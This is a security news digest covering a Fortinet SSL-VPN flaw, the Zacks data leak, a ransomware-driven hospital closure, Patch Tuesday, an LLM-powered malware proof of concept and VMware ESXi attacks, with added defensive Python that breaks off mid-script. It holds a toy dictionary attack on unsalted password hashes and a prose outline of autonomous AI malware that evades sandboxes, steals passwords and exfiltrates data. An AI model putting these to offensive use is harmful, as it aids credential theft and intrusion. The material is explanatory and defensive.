Fortinet addressed a new critical flaw, tracked as CVE-2023-27997, in FortiOS and FortiProxy that was likely exploited in a limited number of attacks.
Fortinet has finally published an official advisory about the critical vulnerability, tracked as CVE-2023-27997 (CVSS score: 9.2), impacting FortiOS and FortiProxy.
“A heap-based buffer overflow vulnerability [CWE-122] in FortiOS and FortiProxy SSL-VPN may allow a remote attacker to execute arbitrary code or commands via specifically crafted requests.” reads the advisory.
The vulnerability is a heap-based buffer overflow issue and according to the vendor it may have been exploited in a limited number of attacks aimed at government, manufacturing, and critical infrastructure sectors.
“Our investigation found that one issue (FG-IR-23-097) may have been exploited in a limited number of cases and we are working closely with customers to monitor the situation.” states the report published by Fortinet. “For this reason, if the customer has SSL-VPN enabled, Fortinet is advising customers to take immediate action to upgrade to the most recent firmware release. If the customer is not operating SSL-VPN the risk of this issue is mitigated – however, Fortinet still recommends upgrading.”
A remote attacker can trigger the vulnerability to execute arbitrary code or commands by sending specifically crafted requests to vulnerable devices.
The vulnerability was reported to Fortinet by the researchers Charles Fol and Dany Bach (DDXhunter) from Lexfo Security. The researchers describe the issue as a reachable pre-authentication flaw that impacts every SSL VPN appliance.
The issue impacts at least:
FortiOS-6K7K version 7.0.10
FortiOS-6K7K version 7.0.5
FortiOS-6K7K version 6.4.12
FortiOS-6K7K version 6.4.10
FortiOS-6K7K version 6.4.8
FortiOS-6K7K version 6.4.6
FortiOS-6K7K version 6.4.2
FortiOS-6K7K version 6.2.9 through 6.2.13
FortiOS-6K7K version 6.2.6 through 6.2.7
FortiOS-6K7K version 6.2.4
FortiOS-6K7K version 6.0.12 through 6.0.16
FortiOS-6K7K version 6.0.10
At least FortiProxy version 7.2.0 through 7.2.3
FortiProxy version 7.0.0 through 7.0.9
FortiProxy version 2.0.0 through 2.0.12
FortiProxy 1.2 all versions
FortiProxy 1.1 all versions
At least FortiOS version 7.2.0 through 7.2.4
FortiOS version 7.0.0 through 7.0.11
FortiOS version 6.4.0 through 6.4.12
FortiOS version 6.2.0 through 6.2.13
FortiOS version 6.0.0 through 6.0.16
The company does not explicitly link FG-IR-23-097 to the Volt Typhoon campaign; however, Fortinet expects that any threat actor, including the Volt Typhoon APT, could start exploiting the issue now that it is public.
Fortinet urges customers to immediately patch their installs.
Below are the actions recommended by the company:
Review your systems for evidence of exploitation of previous vulnerabilities, e.g. FG-IR-22-377 / CVE-2022-40684
Maintain good cyber hygiene and follow vendor patching recommendations
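As an added example, not Fortinet’s own tooling, the following Python checks a FortiOS or FortiProxy version string against the affected ranges listed above and maps the result onto the vendor guidance quoted earlier (upgrade immediately if SSL-VPN is enabled, upgrade anyway if it is not). The AFFECTED table is a manual transcription of that list, the handling of the “all versions” entries is my own, and the inventory at the bottom is constructed.

```python
"""Check a FortiOS / FortiProxy build against the affected ranges for
CVE-2023-27997 (FG-IR-23-097) as listed in the advisory text above.
Added example, not Fortinet tooling; AFFECTED is a manual transcription
of that list. Versions compare as integer tuples, so 7.0.11 > 7.0.9, and
strings such as 'v7.0.11,build0489' are accepted as input."""
import re

ANY = 10**9  # sentinel for "all versions" of a major.minor line

# (product, first affected, last affected), both ends inclusive.
AFFECTED = [
    ("FortiOS", (7, 2, 0), (7, 2, 4)),
    ("FortiOS", (7, 0, 0), (7, 0, 11)),
    ("FortiOS", (6, 4, 0), (6, 4, 12)),
    ("FortiOS", (6, 2, 0), (6, 2, 13)),
    ("FortiOS", (6, 0, 0), (6, 0, 16)),
    ("FortiProxy", (7, 2, 0), (7, 2, 3)),
    ("FortiProxy", (7, 0, 0), (7, 0, 9)),
    ("FortiProxy", (2, 0, 0), (2, 0, 12)),
    ("FortiProxy", (1, 2, 0), (1, 2, ANY)),  # "1.2 all versions"
    ("FortiProxy", (1, 1, 0), (1, 1, ANY)),  # "1.1 all versions"
    # FortiOS-6K7K is listed as discrete builds; a single build is a range of one.
    ("FortiOS-6K7K", (7, 0, 10), (7, 0, 10)),
    ("FortiOS-6K7K", (7, 0, 5), (7, 0, 5)),
    ("FortiOS-6K7K", (6, 4, 12), (6, 4, 12)),
    ("FortiOS-6K7K", (6, 4, 10), (6, 4, 10)),
    ("FortiOS-6K7K", (6, 4, 8), (6, 4, 8)),
    ("FortiOS-6K7K", (6, 4, 6), (6, 4, 6)),
    ("FortiOS-6K7K", (6, 4, 2), (6, 4, 2)),
    ("FortiOS-6K7K", (6, 2, 9), (6, 2, 13)),
    ("FortiOS-6K7K", (6, 2, 6), (6, 2, 7)),
    ("FortiOS-6K7K", (6, 2, 4), (6, 2, 4)),
    ("FortiOS-6K7K", (6, 0, 12), (6, 0, 16)),
    ("FortiOS-6K7K", (6, 0, 10), (6, 0, 10)),
]


def parse_version(text):
    """Extract x.y.z from strings such as '7.0.11' or 'v7.0.11,build0489'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(p) for p in m.groups())


def is_affected(product, version):
    """True if the build falls inside any affected range for that product."""
    v = parse_version(version)
    return any(prod == product and lo <= v <= hi for prod, lo, hi in AFFECTED)


def triage(product, version, sslvpn_enabled):
    """Map the vendor guidance onto one action: outside every affected range
    -> 'not-affected'; affected with SSL-VPN on -> 'upgrade-now'; affected
    with SSL-VPN off -> 'upgrade-recommended' (risk mitigated, still patch)."""
    if not is_affected(product, version):
        return "not-affected"
    return "upgrade-now" if sslvpn_enabled else "upgrade-recommended"


if __name__ == "__main__":
    # Constructed inventory: (hostname, product, version string, SSL-VPN enabled?)
    inventory = [
        ("fw-edge-01", "FortiOS", "v7.0.11,build0489", True),
        ("fw-lab-02", "FortiOS", "7.2.5", True),
        ("proxy-01", "FortiProxy", "1.2.13", False),
    ]
    for host, prod, ver, sslvpn in inventory:
        print(f"{host:12} {prod:10} {ver:20} -> {triage(prod, ver, sslvpn)}")
```

Feed it the output of `get system status` from each device; the regex tolerates the `v7.0.11,build0489` form that command prints. A result of `not-affected` only means the build is outside the listed ranges, so confirm against the advisory’s fixed-release list before closing a ticket.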
A database containing the personal information of more than 8.9 million Zacks Investment Research users was leaked on a cybercrime forum.
A database containing personal information of 8,929,503 Zacks Investment Research users emerged on a popular hacking forum on June 10, 2023.
Zacks is the leading investment research firm focusing on stock research, analysis, and recommendations.
The availability of the archive was reported by the data breach notification service Have I Been Pwned (HIBP), which notified Zacks. According to HIBP, the records in the database contain names, addresses, phone numbers, email addresses, usernames, and passwords stored as unsalted SHA-256 hashes.
The company attempted to downplay the security breach by telling Have I Been Pwned that the threat actors only had access to encrypted passwords. Unsalted SHA-256 hashes are not encryption, however: the same password always produces the same hash, so common passwords can be recovered quickly with precomputed tables or dictionary attacks, and users sharing a password are visible at a glance.
In January, Zacks Investment Research (Zacks) disclosed a data breach; the company reported that the security incident may have affected the personal information of 820,000 customers.
The company discovered the intrusion at the end of 2022; it believes the unauthorized access took place sometime between November 2021 and August 2022.
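To make the point concrete, here is an added Python example (not Zacks’ or HIBP’s code) with constructed users, passwords and a tiny wordlist. Unsalted SHA-256 lets an attacker precompute one table and crack every matching account at once, and it reveals which users share a password before any cracking happens; a per-user random salt with a deliberately slow derivation removes both properties. PBKDF2 from the standard library stands in for the slow hash here so the example has no dependencies; in production use argon2, bcrypt or scrypt.

```python
"""Why "encrypted" (actually unsalted SHA-256) password storage offers little
protection once a dump leaks. Added example; all users, passwords and hashes
below are constructed, not data from the breach."""
import hashlib
import hmac
import os


def unsalted_sha256(password):
    """The storage scheme the article describes: one deterministic hash per password."""
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed "leaked" records: username -> unsalted SHA-256 hex digest.
LEAKED = {
    "alice": unsalted_sha256("Summer2019!"),
    "bob": unsalted_sha256("Summer2019!"),  # same password => identical hash
    "carol": unsalted_sha256("correct horse battery staple"),
}

# A toy wordlist; real attackers use billions of candidates plus mangling rules.
WORDLIST = ["password", "123456", "Summer2019!", "zacks2020"]


def crack_unsalted(leaked, wordlist):
    """One hash per candidate, computed once, cracks every user with that password."""
    table = {unsalted_sha256(w): w for w in wordlist}  # precomputed lookup table
    return {user: table[h] for user, h in leaked.items() if h in table}


def duplicate_groups(leaked):
    """Unsalted hashes reveal which users share a password before any cracking."""
    groups = {}
    for user, h in leaked.items():
        groups.setdefault(h, []).append(user)
    return [sorted(users) for users in groups.values() if len(users) > 1]


def salted_hash(password, salt=None, iterations=600_000):
    """Per-user random salt plus a slow KDF: the table above no longer applies,
    and equal passwords no longer produce equal digests."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_salted(password, salt, digest, iterations=600_000):
    """Constant-time comparison of the recomputed digest against the stored one."""
    _, candidate = salted_hash(password, salt, iterations)
    return hmac.compare_digest(candidate, digest)


def salted_demo(password="Summer2019!", iterations=1000):
    """Two enrolments of the same password differ, yet each verifies correctly.
    (iterations lowered so the demo runs instantly; keep it high in production.)"""
    s1, d1 = salted_hash(password, iterations=iterations)
    _, d2 = salted_hash(password, iterations=iterations)
    return {
        "digests_differ": d1 != d2,
        "verifies": verify_salted(password, s1, d1, iterations),
        "rejects_wrong": not verify_salted("wrong-password", s1, d1, iterations),
    }
```

Running `crack_unsalted(LEAKED, WORDLIST)` recovers both alice’s and bob’s password from a single table lookup, and `duplicate_groups(LEAKED)` pairs them even for an attacker who has no wordlist at all; the same wordlist against `salted_hash` output would have to be rerun per user, at the KDF’s cost for every candidate.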
According to the notice, threat actors had access to an older database of customers who had signed up for the Zacks Elite product between November 1999 through February 2005.
At the time, the company added that it had no evidence that financial data has been exposed due to the security incident.
“In December 2022, the investment research company Zacks announced a data breach. The following month, reports emerged of the incident impacting 820k customers. However, in June 2023, a corpus of data with almost 9M Zacks customers appeared before being broadly circulated on a popular hacking forum. The most recent data was dated May 2020 and included names, usernames, email and physical addresses, phone numbers and passwords stored as unsalted SHA-256 hashes.” reported HIBP. “On disclosure of the larger breach, Zacks advised that in addition to their original report “the unauthorised third parties also gained access to encrypted [sic] passwords of zacks.com customers, but only in the encrypted [sic] format”.”
The company also reset the passwords of the compromised accounts in response to the security breach.
HIBP pointed out that the most recent record in the leaked database is dated May 2020.
Impacted customers should also change the password for all other online accounts for which they used the same credentials as their Zacks account. Customers are also recommended to monitor financial accounts and consumer credit reports.
The availability of the database in the cybercrime ecosystem poses a severe risk for the company users.
St. Margaret’s Health in Illinois is partly closing operations at its hospitals due to a 2021 ransomware attack that impacted its payment system.
In February 2021, a ransomware attack hit St. Margaret’s Health in Illinois and forced the organization to shut down the IT infrastructure at the Spring Valley hospital to contain the threat.
The cyber attack did not impact the Peru branch because it relies on a separate infrastructure.
The payment system was taken offline for months, which caused delays in the billing of medical treatments for the patients with a significant economic impact on the healthcare organization.
Suzanne Stahl, the chair of SMP Health, the hospital’s parent organization, explained that the closure of the hospital was planned last year due to multiple factors, including the impact of the COVID-19 pandemic.
“Due to a number of factors, such as the Covid-19 pandemic, the cyberattack on the computer system of St. Margaret’s Health, and a shortage of staff, it has become impossible to sustain our ministry,” Suzanne Stahl said in a video on Facebook.
On June 16, St. Margaret’s Health will close the Peru branch and the Spring Valley facility.
Suzanne Stahl also added that OSF HealthCare intends to purchase the hospital in Peru.
The closure of the hospital will have a dramatic impact on residents, especially those who are receiving medical treatment. Residents will be forced to travel more than an hour to reach another hospital with an emergency room. Imagine what can happen in the case of a heart attack.
“The hospital closure will have a profound impact on the well-being of our community. This will be a challenging transition for many residents who rely on our hospital for quality healthcare,” said Spring Valley’s mayor, Melanie Malooley-Thompson.
St. Margaret’s Health is the first hospital to cite a cyberattack as a reason for ceasing its activity, NBC News reported.
“There are countless examples of small businesses that have gone bankrupt following ransomware attacks as they were unable to restore their systems or afford to pay to get back up and running,” Errol Weiss, the chief security officer for Health-ISAC, a nonprofit group that shares cyberthreat information with hospitals, said in an email. “It’s tragic that we can now count a hospital in this statistic.”
Microsoft Patch Tuesday security updates for June 2023 fixed 69 flaws in its products, including six critical issues.
Microsoft Patch Tuesday security updates for June 2023 fixed 69 vulnerabilities in multiple products, including Microsoft Windows and Windows Components; Office and Office Components; Exchange Server; Microsoft Edge (Chromium-based); SharePoint Server; .NET and Visual Studio; Microsoft Teams; Azure DevOps; Microsoft Dynamics; and the Remote Desktop Client.
Six of the 69 vulnerabilities addressed by Microsoft are rated Critical, 62 are rated Important, and one is rated Moderate in severity. None of the 69 was publicly known or exploited in the wild at the time of release; the actively exploited Chromium flaw CVE-2023-3079 described below was fixed upstream by Google and reached Edge through the Chromium update.
Five of these vulnerabilities were submitted through the ZDI program.
Below are the descriptions of some of the most interesting issues addressed by Microsoft:
Several of the Critical issues are remote code execution flaws in Windows Pragmatic General Multicast (PGM). A remote, unauthenticated attacker can trigger them to execute arbitrary code on a vulnerable system where the Message Queuing (MSMQ) service is running in a PGM server environment. PGM is a reliable multicast transport protocol that MSMQ uses for multicast delivery. It is important to highlight that PGM is not enabled by default: the Message Queuing service and its multicast support must be installed and running for a host to be exposed, so establishing which hosts actually run MSMQ is the first triage step.
CVE-2023-32021 (CVSS 7.1) – Microsoft Exchange Server Remote Code Execution Vulnerability.
The issue is a remote code execution bug in Microsoft Exchange Server that appears to bypass fixes for issues previously exploited in the wild. An attacker who exploits this flaw can execute arbitrary code with SYSTEM privileges.
CVE-2023-3079 – Chromium: CVE-2023-3079 Type Confusion in V8
This vulnerability is a type confusion bug in Chrome’s V8 JavaScript engine that could lead to code execution at the level of the logged-on user. It was reported to Google on June 1 and is actively exploited in the wild.
The full list of vulnerabilities fixed by Microsoft with the release of Patch Tuesday security updates for June 2023 is available in Microsoft’s Security Update Guide.
Malware researchers analyzed the application of Large Language Models (LLM) to malware automation investigating future abuse in autonomous threats.
Executive Summary
In this report we share some insights that emerged during our exploratory research and proof of concept on the application of Large Language Models to malware automation, investigating what a potential new kind of autonomous threat could look like in the near future.
We explored a potential architecture for an autonomous malware threat based on four main steps: AI-empowered reconnaissance, reasoning, planning, and AI-assisted execution.
We demonstrated the feasibility of using an LLM to recognize the infected environment and decide which kind of malicious actions are best suited to it.
We adopted an iterative code-generation approach to leverage LLMs in the complicated task of generating code on the fly to achieve the malicious objectives of the malware agent.
Luckily, current general-purpose LLMs still have limitations: while incredibly competent, they still need precise instructions to achieve the best results.
This new kind of threat has the potential to become extremely dangerous in the future, when the computational requirements of LLMs are low enough to run the agent completely locally, and when special-purpose models replace general-purpose ones.
Introduction
Large Language Models have started shaping the digital world around us. Since the public launch of OpenAI’s ChatGPT, everybody has caught a glimpse of a new era in which LLMs will profoundly impact multiple sectors.
The cyber security industry is no exception; rather, it could be one of the most fertile grounds for such technologies, for good and for bad. Researchers have just scratched the surface of these applications, for instance in red teaming, as in the case of the PentestGPT project, but more recently also in malware-related work: Juniper researchers used ChatGPT to generate malicious code to demonstrate the speedup in malware writing, CyberArk researchers tried to use ChatGPT to build polymorphic malware, and HYAS researchers created another polymorphic AI-powered malware in Python.
Following this trail of research, we decided to experiment with LLMs in a slightly different manner: our objective was to see whether such technology could lead to a paradigm shift in the way we see malware and attackers. To do so, we prototyped a sort of “malicious agent”, written entirely in PowerShell, able not only to generate evasive polymorphic code but also to take some degree of decision based on the context and its “intents”.
Technical Analysis
This is an uncommon threat research article: the focus is not on a real-world threat actor; instead we dig into an approach that could plausibly be adopted in the near future by a whole new class of malicious actors, the AI-powered autonomous threat.
A model for Autonomous Threats
First of all, we describe a general architecture that could be adopted for such an objective, one which inevitably has common ground with task-driven autonomous agents like babyAGI or AutoGPT. For the sake of our experimentation, however, we shaped the logic flow of the malicious agent to better match common malware operations.
As anticipated, our Proof of Concept (PoC) autonomous malware is an AI-enabled PowerShell script, designed to illustrate the potential of artificial intelligence in automation and decision-making, with each phase of execution highlighting the adaptability of the AI.
Breaking down the state diagram at a high level, the agent runs through the following stages.
Footprinting
During the discovery phase, the AI conducts a comprehensive analysis of the system. Its goal is to create a thorough profile of the operating environment. It examines system properties such as the operating system, installed applications, network setups, and other pertinent information.
This thorough assessment is not just for ensuring the system is ready to go; it also helps the AI work out whether it is in a controlled environment and whether it is running on a server or a client. One of the crucial determinations it makes is whether it is functioning within a sandboxed environment. Sandboxes are controlled settings, often used for testing or monitoring potentially harmful activities. If the AI detects it is operating within a sandbox, it halts all execution, avoiding unnecessary exposure in a non-targeted environment.
This system data becomes a vital input that lets the malicious-AI make informed decisions and respond appropriately. It provides a comprehensive understanding of its operating environment, similar to a detailed map, allowing it to navigate the system effectively. In this sense, this phase readies the “malicious agent” for the activities that follow.
Reasoning
In the reasoning phase, the malicious agent’s maneuvers rely significantly on the context, built on the detailed understanding of the system environment gathered in the earlier footprinting phase.
An intriguing aspect of this phase is the AI’s strategic decision-making, which closely emulates strategies used by well-known hacking groups. At the outset, the “malicious agent” mimics a specific, recognized hacking group. The selection of the group isn’t random but is determined by the particular context and conditions of the system.
After deciding which hacking group to mimic, the autonomous agent goes on to devise a comprehensive attack strategy. This strategy is custom-made to the specific system environment and the standard practices of the selected hacking group, for example, it may decide to include password stealing tasks in case it detects the Outlook application rather than install a backdoor account on the server.
Execution
Once the attack strategy is in place, the malicious agent begins to carry out each action in a step-by-step manner. For each action, the AI dynamically creates the necessary code and promptly puts it into action. This could include a broad range of operations, such as attempting privilege escalation, conducting password hunts, or establishing persistence.
However, the AI’s role isn’t just limited to implementation. It consistently keeps an eye on how the system responds to its actions and stays ready for unexpected occurrences. This attentiveness allows the AI to adapt and modify its actions in real time, showcasing its ability for resilience and strategic problem-solving within a changing system environment.
When guided by more specific prompts, AI proves to be exceptionally capable, even to the point of generating functional infostealers on the fly.
This AI-empowered PoC epitomizes the potential of AI in carrying out intricate tasks independently and adjusting to its environment.
Code Generation
One of the fundamental characteristics that set autonomous threats apart is their ability to generate code. Unlike traditional threats, which often require manual control or pre-programmed scripts to adapt and evolve, autonomous threats use AI algorithms to autonomously generate new code segments. This dynamic code generation ability not only allows them to adapt to changing system conditions and defenses but also makes their detection and analysis more challenging.
This process involves the use of specific prompts, allowing the AI to create custom solutions that suit the system’s unique conditions. The AI also takes an active role in monitoring the outcomes of its actions. It continually assesses the results of its code execution. If it detects errors or unsuccessful actions, it uses them as inputs for further processing. By feeding error data back into its processes, the AI can refine and optimize its code generation. This iterative process represents a significant step towards true autonomous problem-solving capabilities, as the AI dynamically adjusts its actions based on their results.
Figure. Iterative code generation and adjustment
Environment Awareness
Autonomous threats take threat intelligence to a new level by being aware of their operating environment. Traditional threats often have a one-size-fits-all approach, attacking systems without fully understanding the environment. In contrast, autonomous threats can actively monitor their environment and adapt their actions accordingly.
The concept of environmental awareness is pivotal in AI-powered cyber threats. This environmental understanding enables the autonomous malware to choose an appropriate course of action based on the context around. For example, it might identify if it’s operating within a sandbox environment or decide to behave differently based on whether it’s operating on a server or client machine.
This awareness also influences the AI’s decision-making process during its operation. It can adjust its behavior according to the context, impersonating a particular known hacker group or choosing a specific attack strategy based on the evaluated system characteristics.
This environment-aware approach could enable malware writers to rely on very sophisticated, and harder to counter, evasion schemes.
Figure. Prompt to evaluate the machine environment
Decision-Making Autonomy
Perhaps the most defining characteristic of autonomous malware is the decision-making autonomy. Unlike traditional threats that rely on pre-programmed behaviors or external control from a human operator, autonomous threats can make independent decisions about their actions.
These threats use advanced AI algorithms to analyze the available information, weigh the potential outcomes of different actions, and choose the most effective course of action. This decision-making process could involve choosing which systems to target, selecting the best method for attack, deciding when to lay dormant to avoid detection, and even determining when to delete themselves to avoid traceability.
This level of autonomy not only makes these threats more resilient to countermeasures, but it also allows them to carry out more complex and coordinated attacks. By making independent decisions, these threats can adapt to changing circumstances, carry out long-term infiltration strategies, and even coordinate with other autonomous threats to achieve their objectives.
Proof of Concept
In this proof of concept (PoC), we launched our AI-enabled script on a Windows client. The script’s execution process is designed to illustrate the potential of AI in automating complex tasks, decision making, and adjusting to the environment.
Firstly, the script initiates with an exhaustive system footprinting. During this phase, the AI takes a thorough survey of the system. The focus is on creating a detailed footprint of the operating environment by examining properties such as the operating system, installed software and other relevant details. This rigorous assessment not only prepares the system for the following actions but also helps the AI understand the context it’s operating within.
Simultaneously, a crucial part of this initial phase is sandbox detection. In fact, if the AI identifies the environment as a sandbox, the execution halts immediately.
Once the AI has confirmed it’s not within a sandbox, and it’s dealing with a client, it proceeds to develop an infostealer — a type of malware that’s designed to gather and extract sensitive information from the system. In this specific case, the AI installs a keylogger to monitor and record keystrokes, providing a reliable method to capture user inputs, including passwords.
Alongside keylogging, during the test sessions, the AI performed password hunting too.
Finally, after gathering all the necessary data, the AI proceeds to data exfiltration: it prepares all the accumulated data for extraction, ensuring it is formatted and secured in a way that lets it be efficiently and safely retrieved from the system.
The demonstration video provides a real-time view of these actions carried out by the AI.
This PoC underlines how an AI system can perform complex tasks, adapt to its environment, and carry out activities that previously required advanced knowledge and manual interaction.
Consideration on Experimentation Session
In all the experiments conducted, a key theme that emerged was the level of exactness needed when assigning tasks to the AI. When presented with vague or wide-ranging tasks, the AI’s output frequently lacked effectiveness and specificity. This highlights an essential trait of AI at its current stage: while incredibly competent, it still needs precise instruction to achieve the best results.
For instance, when tasked to create a generic malicious script, the AI might generate code that tries to cover a wide spectrum of harmful activities. The outcome could be a piece of code that is wide-ranging and inefficient, potentially even drawing unwanted scrutiny due to its excessive system activity.
On the other hand, when given more narrowly defined tasks, the AI demonstrated the capability to create specific components of malware. By steering the AI through smaller, more exact tasks, we could create malicious scripts that were more focused and effective. Each component could be custom-made to carry out its task with a high level of effectiveness, leading to the creation of a cohesive, efficient malware when combined.
This discovery suggests a more efficient method of utilizing AI in cybersecurity — breaking down complex tasks into smaller, manageable objectives. This modular approach allows for the creation of specific code pieces that carry out designated functions effectively and can be assembled into a larger whole.
Conclusion
In conclusion, when we look at LLMs and malware combined, we clearly see a significant evolution in cybersecurity threats, potentially leading to a paradigm shift in which malicious code operates on the basis of predefined high-level intents.
Their ability to generate code, understand their environment, and make autonomous decisions makes them a formidable challenge for future cybersecurity defenses. However, by understanding these characteristics, we can start to develop effective strategies and technologies to counter these emerging threats.
Luckily, the autonomous malware PoC we set up, and the potential upcoming ones, still have limitations: they rely on generic language models hosted online, which means internet connectivity is, and will be, a requirement for at least some time. But we are likely going to see the adoption of local LLMs, maybe even special-purpose ones, directly embedded in future malicious agents.
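That dependency on a hosted model is also the defender’s opening. As an added detection example (not part of the research above or its PoC), the following Python takes network-connection telemetry and flags script interpreters opening connections to LLM API endpoints, the traffic an agent of this kind must generate once per generate-execute-adjust iteration. The events are constructed in Sysmon Event ID 3 style, and the list of API hostnames is an assumption to tune for your environment.

```python
"""Hunt for script hosts talking to hosted LLM APIs in network telemetry.
Added detection example, not code from the research above. EVENTS are
constructed Sysmon-style (Event ID 3) network-connection records;
LLM_API_HOSTS is an assumed starting list, not an authoritative one."""
from collections import Counter

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
LLM_API_HOSTS = {"api.openai.com", "api.anthropic.com", "generativelanguage.googleapis.com"}

# Constructed events with the Sysmon field names a SIEM would expose.
EVENTS = [
    {"Computer": "WKS-01", "Image": r"C:\Program Files\Browser\browser.exe",
     "DestinationHostname": "api.openai.com", "DestinationPort": 443},
    {"Computer": "WKS-01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "api.openai.com", "DestinationPort": 443},
    {"Computer": "WKS-01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "API.openai.com", "DestinationPort": 443},
    {"Computer": "WKS-02", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "updates.corp.example", "DestinationPort": 443},
    {"Computer": "SRV-03", "Image": r"C:\Windows\System32\wscript.exe",
     "DestinationHostname": "generativelanguage.googleapis.com", "DestinationPort": 443},
]


def image_name(path):
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def llm_calls_from_script_hosts(events):
    """Counter keyed by (computer, interpreter, api host) for matching events.
    A browser reaching the same API is ignored: the signal is the interpreter.
    Repeated hits from one interpreter are expected, since the agent described
    above calls the model once per generate-execute-adjust iteration."""
    hits = Counter()
    for ev in events:
        name = image_name(ev["Image"])
        dest = ev["DestinationHostname"].lower()
        if name in SCRIPT_HOSTS and dest in LLM_API_HOSTS:
            hits[(ev["Computer"], name, dest)] += 1
    return hits


def alerts(events, min_hits=1):
    """Human-readable alert lines, busiest first; raise min_hits to keep only
    interpreters that talk to the API repeatedly."""
    ranked = sorted(llm_calls_from_script_hosts(events).items(), key=lambda kv: -kv[1])
    return [
        f"{computer}: {name} -> {dest} ({n} connection(s))"
        for (computer, name, dest), n in ranked
        if n >= min_hits
    ]
```

Hostnames only appear in Event ID 3 when Sysmon’s DNS lookup is enabled; on a proxy log the same logic applies to the requested host. Expect legitimate hits from developer workstations, so pair the rule with an allow-list of hosts where scripted LLM use is sanctioned rather than treating every match as an incident.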
AI technology is in a rapid-development stage, and even if it is pretty young, its adoption across various sectors is widening, including in the criminal underground.
A China-linked APT group tracked as UNC3886 has been spotted exploiting a VMware ESXi zero-day vulnerability.
Mandiant researchers observed a China-linked cyberespionage group, tracked as UNC3886, exploiting a VMware ESXi zero-day vulnerability tracked as CVE-2023-20867.
“VMware Tools contains an Authentication Bypass vulnerability in the vgauth module.” reads the advisory published by VMware. “A fully compromised ESXi host can force VMware Tools to fail to authenticate host-to-guest operations, impacting the confidentiality and integrity of the guest virtual machine.”
Researchers from Mandiant first detailed the activity of the group in September 2022 when they discovered a novel malware persistence technique within VMware ESXi Hypervisors.
The technique allowed attackers who had already gained administrative access to a VMware ESXi hypervisor to maintain that access persistently and to take over vCenter servers and Windows and Linux virtual machines.
The highly targeted and evasive nature of this attack leads the experts into believing that the attack was carried out for cyberespionage purposes by a China-linked actor tracked as UNC3886.
In the attack investigated by Mandiant in September 2022, threat actors relied on malicious vSphere Installation Bundles (“VIBs”) to install two backdoors on the ESXi hypervisors, tracked as VIRTUALPITA and VIRTUALPIE. VIBs are collections of files that are designed to manage virtual systems, they can be used to create startup tasks, custom firewall rules, or deploy custom binaries upon the restart of an ESXi machine.
Further investigation by Mandiant revealed additional techniques UNC3886 used to target multiple organizations while evading EDR solutions.
The cyberespionage group was observed harvesting credentials for the service accounts of all connected ESXi hosts from the vPostgreSQL database embedded in the vCenter Server Appliance. The threat actors exploited the zero-day CVE-2023-20867 to execute privileged commands on Windows, Linux, and PhotonOS (vCenter) guest VMs from a compromised ESXi host without guest credentials, and without generating any default logging on the guest VMs.
The CVE-2023-20867 flaw is only exploitable by an attacker who already has root access on the ESXi host, which is why VMware rated it low severity despite its impact once a host is compromised.
The attackers then deployed backdoors on ESXi hosts that use an alternative socket address family, VMCI (Virtual Machine Communication Interface), for lateral movement and persistence.
In recent attacks, Chinese hackers were also spotted modifying and disabling logging services on compromised systems.
“Mandiant previously noted in 2022 that it did not identify evidence of a CVE being exploited during past investigations. As investigations into UNC3886 activity continued in 2023, Mandiant discovered that the attacker utilized a zero-day vulnerability, CVE-2023-20867, to execute commands and transfer files to and from guest VMs from a compromised ESXi host without the need for guest credentials.” reads the analysis published by Mandiant. “Additionally, the use of CVE-2023-20867 does not generate an authentication log event on the guest VM when commands are executed from the ESXi host.”
Mandiant observed UNC3886 using multiple VMCI backdoors deployed as malicious VIBs on ESXi hosts.
Once the attackers opened a communication channel between guest and host, they gained a new means of persistence: they could regain access to a backdoored ESXi host as long as the backdoor remained deployed and they obtained initial access to any guest machine.
The backdoor thus bypasses the network segmentation normally required to reach the ESXi host and evades most security reviews of open listening ports and anomalous NetFlow, since VMCI traffic between guest and host never traverses the network.
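Since the persistence mechanism described above is a VIB, the installed-VIB inventory is the first place to look. As an added example, not Mandiant’s tooling, the following Python parses the output of `esxcli software vib list` and flags packages whose acceptance level is below the signed levels, or whose vendor claims to be VMware without a VMware-issued level. The SAMPLE output is constructed in the layout esxcli prints; version strings in it are made up, and the vendor-mismatch heuristic is mine.

```python
"""Triage `esxcli software vib list` output for suspicious VIBs.
Added example, not Mandiant tooling. SAMPLE is constructed output in the
layout esxcli prints (columns separated by two or more spaces). On a real
host, run the command locally or over SSH and feed its stdout to
parse_vib_list(); follow up with `esxcli software vib signature verify`."""
import re

# Levels that imply a VMware or partner signature. CommunitySupported VIBs
# carry no trusted signature, which is what an attacker-built VIB ends up with.
TRUSTED_LEVELS = {"VMwareCertified", "VMwareAccepted", "PartnerSupported"}

SAMPLE = """\
Name           Version                              Vendor  Acceptance Level    Install Date
-------------  -----------------------------------  ------  ------------------  ------------
esx-base       7.0.3-0.65.20036589                  VMware  VMwareCertified     2022-10-01
nvme-pcie      1.2.3.16-1vmw.703.0.20.19193900      VMW     VMwareCertified     2022-10-01
vmsyslog       1.0-1                                VMware  CommunitySupported  2023-01-15
"""


def parse_vib_list(text):
    """Split esxcli's table (fields separated by 2+ spaces) into dicts keyed
    by the header names; the dashed ruler line is skipped."""
    lines = [ln for ln in text.splitlines() if ln.strip() and not ln.startswith("-")]
    header = re.split(r"\s{2,}", lines[0].strip())
    rows = []
    for ln in lines[1:]:
        fields = re.split(r"\s{2,}", ln.strip())
        rows.append(dict(zip(header, fields)))
    return rows


def suspicious_vibs(records):
    """Return (name, reason) pairs for VIBs that deserve a closer look.
    Heuristic 1: acceptance level outside the signed set.
    Heuristic 2 (added here, not from Mandiant): a VIB whose vendor field says
    VMware/VMW but whose level is not VMware-issued, i.e. a spoofed vendor."""
    findings = []
    for r in records:
        level = r.get("Acceptance Level", "")
        vendor = r.get("Vendor", "")
        if level not in TRUSTED_LEVELS:
            findings.append((r["Name"], f"acceptance level {level}"))
        elif vendor in {"VMware", "VMW"} and not level.startswith("VMware"):
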